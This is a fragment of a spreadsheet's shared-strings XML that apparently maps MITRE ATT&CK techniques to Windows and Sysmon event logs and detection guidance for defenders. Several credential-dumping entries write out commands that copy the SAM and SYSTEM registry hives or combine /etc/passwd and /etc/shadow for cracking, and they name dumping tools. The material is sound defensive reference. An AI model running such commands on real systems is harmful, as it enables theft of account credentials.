  <si>
    <t>25;30;20;25</t>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>15;25;30;30</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>T1138</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>20;30;50</t>
  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>50;50</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>T1151</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>T1154</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>T1157</t>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>T1160</t>
  </si>
  <si>
    <t>T1161</t>
  </si>
  <si>
    <t>T1162</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>T1165</t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>T1167</t>
  </si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>T1173</t>
  </si>
  <si>
    <t>T1174</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>15;10;20;5;20;15;15</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>10;10;20;20;10;30</t>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <t>20;20;10;20;15;15</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>T1179</t>
  </si>
  <si>
    <t>15;10;20;20;20;15</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>T1184</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>30;15;30;25</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>20;25;20;35</t>
  </si>
  <si>
    <t>T1188</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>15;15;15;20;20;15</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>20;30;25;25</t>
  </si>
  <si>
    <t>T1192</t>
  </si>
  <si>
    <t>10;20;20;10;10;15;15</t>
  </si>
  <si>
    <t>T1193</t>
  </si>
  <si>
    <t>10;10;20;20;20;20</t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>T1196</t>
  </si>
  <si>
    <t>15;10;15;15;15;15;15</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>25;35;20;20</t>
  </si>
  <si>
    <t>T1208</t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>20;10;20;10;20;20</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1214</t>
  </si>
  <si>
    <t>T1215</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>T1223</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>30;25;30;15</t>
  </si>
  <si>
    <t>T1483</t>
  </si>
  <si>
    <t>20;20;15;20;25</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>25;30;25;20</t>
  </si>
  <si>
    <t>T1487</t>
  </si>
  <si>
    <t>T1488</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>T1492</t>
  </si>
  <si>
    <t>T1493</t>
  </si>
  <si>
    <t>T1494</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>35;35;20;10</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>10;15;15;15;15;15;15</t>
  </si>
  <si>
    <t>T1500</t>
  </si>
  <si>
    <t>T1501</t>
  </si>
  <si>
    <t>T1502</t>
  </si>
  <si>
    <t>T1503</t>
  </si>
  <si>
    <t>T1504</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>T1506</t>
  </si>
  <si>
    <t>T1514</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>T1519</t>
  </si>
  <si>
    <t>T1522</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>T1527</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>T1536</t>
  </si>
  <si>
    <t>22;22;22;12;22</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>30;30;10;30</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Defense Bypassed</t>
  </si>
  <si>
    <t>10;20;15;15;10;10;20</t>
  </si>
  <si>
    <t>10;20;20;10;10;20;10</t>
  </si>
  <si>
    <t>20;20;10;20;20;10</t>
  </si>
  <si>
    <t>15;20;25;20;20</t>
  </si>
  <si>
    <t>30;35;30</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Data score</t>
  </si>
  <si>
    <t>Alerting</t>
  </si>
  <si>
    <t>Hunting</t>
  </si>
  <si>
    <t>Forensics</t>
  </si>
  <si>
    <t>EventID</t>
  </si>
  <si>
    <t>Event Description</t>
  </si>
  <si>
    <t>Log Name</t>
  </si>
  <si>
    <t>Verbosity Signal</t>
  </si>
  <si>
    <t>Detection Relevance</t>
  </si>
  <si>
    <t>Process creation</t>
  </si>
  <si>
    <t>Microsoft-Windows-Sysmon/Operational</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>A process changed a file creation time</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>Network connection</t>
  </si>
  <si>
    <t>Sysmon service state changed</t>
  </si>
  <si>
    <t>Process terminated</t>
  </si>
  <si>
    <t>Driver loaded</t>
  </si>
  <si>
    <t>WSMan session initialized</t>
  </si>
  <si>
    <t>Microsoft-Windows-WinRM/Operational</t>
  </si>
  <si>
    <t>Image loaded</t>
  </si>
  <si>
    <t>CreateRemoteThread</t>
  </si>
  <si>
    <t>WSMan session de-initialized</t>
  </si>
  <si>
    <t>RawAccessRead</t>
  </si>
  <si>
    <t>ProcessAccess</t>
  </si>
  <si>
    <t>FileCreate</t>
  </si>
  <si>
    <t>RegistryEvent (Value Set)</t>
  </si>
  <si>
    <t>RegistryEvent (Key and Value Rename)</t>
  </si>
  <si>
    <t>FileCreateStreamHash</t>
  </si>
  <si>
    <t>Sysmon Config State Changed</t>
  </si>
  <si>
    <t>PipeEvent - Pipe Created</t>
  </si>
  <si>
    <t>PipeEvent - Pipe Connected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventFilter activity detected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventConsumer activity detected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventConsumerToFilter activity detected</t>
  </si>
  <si>
    <t>RDP source IP / logon user name</t>
  </si>
  <si>
    <t>Microsoft-Windows-TerminalServices-LocalSessionManager/Operational</t>
  </si>
  <si>
    <t>RDP logon user name</t>
  </si>
  <si>
    <t>WinRM session creation</t>
  </si>
  <si>
    <t>RDP connection attempt with source IP / logon user name</t>
  </si>
  <si>
    <t>Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational</t>
  </si>
  <si>
    <t>The System log file was cleared (covers sysmon logs deletion)</t>
  </si>
  <si>
    <t>System</t>
  </si>
  <si>
    <t>Very High</t>
  </si>
  <si>
    <t>Scheduled task created</t>
  </si>
  <si>
    <t>Microsoft-Windows-TaskScheduler/Maintenance</t>
  </si>
  <si>
    <t>RDP successful connection</t>
  </si>
  <si>
    <t>Scheduled task updated</t>
  </si>
  <si>
    <t>Scheduled task deleted</t>
  </si>
  <si>
    <t>WinRM authenticating user</t>
  </si>
  <si>
    <t>Scheduled task executed</t>
  </si>
  <si>
    <t>Scheduled task completed</t>
  </si>
  <si>
    <t>Lookup: Query received</t>
  </si>
  <si>
    <t>DNS analytic logs</t>
  </si>
  <si>
    <t>Lookup: Response success</t>
  </si>
  <si>
    <t>Recursive query: Response in</t>
  </si>
  <si>
    <t>Engine Lifecycle - Start</t>
  </si>
  <si>
    <t>Windows PowerShell</t>
  </si>
  <si>
    <t>Engine Lifecycle - Stopped</t>
  </si>
  <si>
    <t>Provider Lifecycle</t>
  </si>
  <si>
    <t>Detected Malware</t>
  </si>
  <si>
    <t>Microsoft-Windows-Windows Defender/Operational</t>
  </si>
  <si>
    <t>Action on Malware failed</t>
  </si>
  <si>
    <t>The event logging service has shut down</t>
  </si>
  <si>
    <t>The audit log was cleared (Security)</t>
  </si>
  <si>
    <t>Security</t>
  </si>
  <si>
    <t>Windows Defender Antivirus has detected malware or other potentially unwanted software.</t>
  </si>
  <si>
    <t>Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.</t>
  </si>
  <si>
    <t>A rule has been added to the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>Microsoft-Windows-Windows Firewall With Advanced Security/Firewall</t>
  </si>
  <si>
    <t>A rule has been modified in the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>A rule has been deleted in the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>PowerShell Module Logging</t>
  </si>
  <si>
    <t>Microsoft-Windows-PowerShell/Operational</t>
  </si>
  <si>
    <t>PowerShell Script Block Logging (Win 2012R2 and above)</t>
  </si>
  <si>
    <t>The system time was changed</t>
  </si>
  <si>
    <t>An account was successfully logged on</t>
  </si>
  <si>
    <t>An account failed to log on</t>
  </si>
  <si>
    <t>Group membership information (win10, 2016 &amp; 2019)</t>
  </si>
  <si>
    <t>A logon was attempted using explicit credentials</t>
  </si>
  <si>
    <t>A registry value was modified</t>
  </si>
  <si>
    <t>A handle to an object was requested</t>
  </si>
  <si>
    <t>An operation was performed on an object</t>
  </si>
  <si>
    <t>An attempt was made to access an object</t>
  </si>
  <si>
    <t>Special privileges assigned to new logon</t>
  </si>
  <si>
    <t>A new process has been created (enable command line logging, see references column)</t>
  </si>
  <si>
    <t>A service was installed in the system</t>
  </si>
  <si>
    <t>A scheduled task was created</t>
  </si>
  <si>
    <t>A scheduled task was deleted</t>
  </si>
  <si>
    <t>A scheduled task was updated</t>
  </si>
  <si>
    <t>A user account was created</t>
  </si>
  <si>
    <t>A user account was enabled</t>
  </si>
  <si>
    <t>A member was added to a security-enabled global group</t>
  </si>
  <si>
    <t>A member was added to a security-enabled local group</t>
  </si>
  <si>
    <t>A user account was changed</t>
  </si>
  <si>
    <t>A computer account was created</t>
  </si>
  <si>
    <t>A Kerberos authentication ticket (TGT) was requested</t>
  </si>
  <si>
    <t>A Kerberos service ticket was requested.</t>
  </si>
  <si>
    <t>The domain controller attempted to validate the credentials for an account (NTLM)</t>
  </si>
  <si>
    <t>A session was reconnected to a Window Station</t>
  </si>
  <si>
    <t>A security-enabled local group or account membership was enumerated (win10, 2016 &amp; 2019)</t>
  </si>
  <si>
    <t>A user's local group membership was enumerated.</t>
  </si>
  <si>
    <t>Code integrity determined that the image hash of a file is not valid (Kernel Driver Signing)</t>
  </si>
  <si>
    <t>A network share object was accessed</t>
  </si>
  <si>
    <t>High (File Shares, DC)</t>
  </si>
  <si>
    <t>A network share object was added</t>
  </si>
  <si>
    <t>A network share object was checked to see whether client can be granted desired access</t>
  </si>
  <si>
    <t>The Windows Filtering Platform blocked a packet</t>
  </si>
  <si>
    <t>The Windows Filtering Platform has allowed a connection</t>
  </si>
  <si>
    <t>The Windows Filtering Platform has permitted a bind to a local port</t>
  </si>
  <si>
    <t>ActiveScriptEventConsumer provider started</t>
  </si>
  <si>
    <t>Microsoft-Windows-WMI-Activity/Operational</t>
  </si>
  <si>
    <t>Registration of temporary WMI event consumer</t>
  </si>
  <si>
    <t>Registration of permanent WMI event consumer</t>
  </si>
  <si>
    <t>Event log service stopped</t>
  </si>
  <si>
    <t>Code Integrity determined that the page hashes of an image file are not valid (Kernel Driver Signing)</t>
  </si>
  <si>
    <t>Service entered stopped state (event log service, AV service etc.)</t>
  </si>
  <si>
    <t>A service config was changed</t>
  </si>
  <si>
    <t>AppLocker Block</t>
  </si>
  <si>
    <t>Microsoft-Windows-AppLocker/EXE and DLL</t>
  </si>
  <si>
    <t>AppLocker Warning</t>
  </si>
  <si>
    <t>Platforms</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process monitoring,Network protocol analysis</t>
  </si>
  <si>
    <t>Linux,macOS,Windows</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect.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 </t>
  </si>
  <si>
    <t>command-and-control</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Junk Data</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>Linux,Windows,macOS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. </t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,Linux,macOS</t>
  </si>
  <si>
    <t>### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM)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[Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.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[Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&lt;pid&gt;/maps&lt;/code&gt;, where the &lt;code&gt;&lt;pid&gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.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t>
  </si>
  <si>
    <t>credential-access</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>Process command-line parameters,PowerShell logs,Process monitoring</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.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module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">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Windows Security Support Provider (SSP) DLLs are loaded into LSSAS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t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>Hash dumpers open the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;)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[Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the &lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,PowerShell logs,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>Process monitoring,PowerShell logs,Process command-line parameters</t>
  </si>
  <si>
    <t>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module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>PowerShell logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>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module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>Windows event logs</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\*/maps&lt;/code&gt;, where the &lt;code&gt;\*&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Adversaries may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system.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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>API monitoring</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.</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</si>
  <si>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bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>defense-evasion</t>
  </si>
  <si>
    <t>File monitoring,File system access controls</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process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</si>
  <si>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information related to services.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</si>
